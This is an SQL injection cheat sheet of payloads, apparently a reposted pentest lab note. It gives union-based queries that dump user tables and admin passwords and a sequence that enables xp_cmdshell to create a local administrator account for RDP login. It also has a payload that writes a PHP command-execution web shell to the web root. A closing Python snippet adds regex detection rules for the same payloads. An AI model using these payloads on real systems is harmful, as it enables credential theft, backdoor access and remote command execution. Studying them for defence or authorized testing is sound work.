SQL Injection Assortment


SQL injection (union based, Oracle)

http://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet
https://guide.offsecnewbie.com/5-sql
http://www.securityidiots.com/Web-Pentest/SQL-Injection/Union-based-Oracle-Injection.html
http://egloos.zum.com/totoriver/v/3012348

!! In some cases the input goes into a cookie rather than an ordinary user input field !!

0. List Users
▶ 'or 1=1 union select name,null FROM master..syslogins--

1. Enumerate columns
'or 1=1 order by 3 --

2. Find type of columns (string or number)
'or 1=1 union select null,null,null from dual --
'or 1=1 union select '1111',null,null from dual --
'or 1=1 union select user,null,null from dual --

3. Extract table names
'or 1=1 union select table_name,null,null from all_tables --
'or 1=1 union select table_name,null FROM information_schema.tables --

4. Extract Column names:
'or 1=1 union select column_name,null from information_schema.columns where table_name='users' -- --
'or 1=1 union select column_name,null,null from all_tab_columns where table_name='WEB_ADMINS' --

5. Admin name and password :
'or 1=1 union select ADMIN_NAME,PASSWORD,PASSWORD,null from WEB_ADMINS --
▶ 'or 1=1 union select name,null from users --
▶ 'or 1=1 union select pass,null from users --

6. find injectable parameter with time delays
'or 1=1 ; WAITFOR DELAY '0:0:5' --

7. If 6 works, I can try to enable xp_cmdshell:
▶ 'or 1=1 ; Use master; --
▶ 'or 1=1 ; exec sp_configure 'show advanced options', 1;--
▶ 'or 1=1 ; reconfigure;--
▶ 'or 1=1 ; exec sp_configure 'xp_cmdshell', 1;--
▶ 'or 1=1 ; reconfigure;--
▶ 'or 1=1 ; exec master..xp_cmdshell 'net user OS-94404 password1! /add && net localgroup administrators OS-94404 /add'; --

8. Test login over RDP
rdesktop 10.11.1.x -u OS-94404 -p password1! -g 70% &

---------------------------------------

**** SQL Injection ****

OR 1=2 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,@@version,11#"];

OR 1=2 UNION SELECT 1,2,3,4,5,6,7,8,9,table_name,11 FROM information_schema.tables#"];
(check table names)

OR 1=2 UNION SELECT 1,2,3,4,5,6,7,8,9,column_name,11 FROM information_schema.columns WHERE table_name='wp_users'#"];
(check the columns of that table)

OR 1=2 UNION SELECT 1,2,3,4,5,6,7,8,9,user_login,11 FROM wp_users#"];
(check user names)

OR 1=2 UNION SELECT 1,2,3,4,5,6,7,8,9,user_pass,11 FROM wp_users#"];
(check passwords)

debug.php?id=1 union all select 1, 2, "' . shell_exec($_GET['cmd']);?> . '';?>" into OUTFILE "c:/xampp/htdocs/backdoor.php"
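
An added example, not part of the original post: a log-side check that flags the statement shapes listed above in a request's query string, cookie, or body, since the note above says the input may arrive in a cookie. The field names (`query`, `cookie`, `body`), the rule names, and the sample requests are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Rule name -> pattern. Keywords are the ones used in the statements on this page.
RULES = {
    "column-count probe": re.compile(r"\border\s+by\s+\d+\s*(--|#)", re.I),
    "union select": re.compile(r"\bunion\s+(all\s+)?select\b", re.I),
    "schema enumeration": re.compile(
        r"\b(information_schema\.(tables|columns)|all_tables|all_tab_columns"
        r"|master\.\.syslogins)\b", re.I),
    "time delay": re.compile(r"\bwaitfor\s+delay\b", re.I),
    "xp_cmdshell setup": re.compile(r"\b(sp_configure|xp_cmdshell)\b", re.I),
    "file write": re.compile(r"\binto\s+outfile\b", re.I),
}

def normalize(value):
    """URL-decode up to three times (catches double encoding), collapse whitespace."""
    for _ in range(3):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return re.sub(r"\s+", " ", value)

def classify(request):
    """Return {field: [rule names]} for each request field that matches a rule."""
    hits = {}
    for field in ("query", "cookie", "body"):  # cookies are checked like any other input
        text = normalize(request.get(field, ""))
        matched = [name for name, rx in RULES.items() if rx.search(text)]
        if matched:
            hits[field] = matched
    return hits

# Constructed sample requests (hypothetical field layout, not real log data).
SAMPLES = [
    {"query": "id=7", "cookie": "session=ab12"},
    {"query": "id=1%27or+1%3D1+order+by+3+--"},
    {"query": "page=2", "cookie": "lang=en%2527or%25201=1%2520union%2520select"
        "%2520table_name,null%2520FROM%2520information_schema.tables%2520--"},
    {"body": "q=x';+WAITFOR+DELAY+'0:0:5'+--"},
    {"query": "q=trade+union+select+committee"},  # benign text, still matches
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(classify(sample) or "clean", "<-", sample)
```

Keyword rules like these are a triage signal only: the last sample is a false positive, and the fix for the injection itself is parameterized queries in the application.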

from http://takudaddy.tistory.com/480 by ccl(A) rewrite - 2021-12-11 17:01:12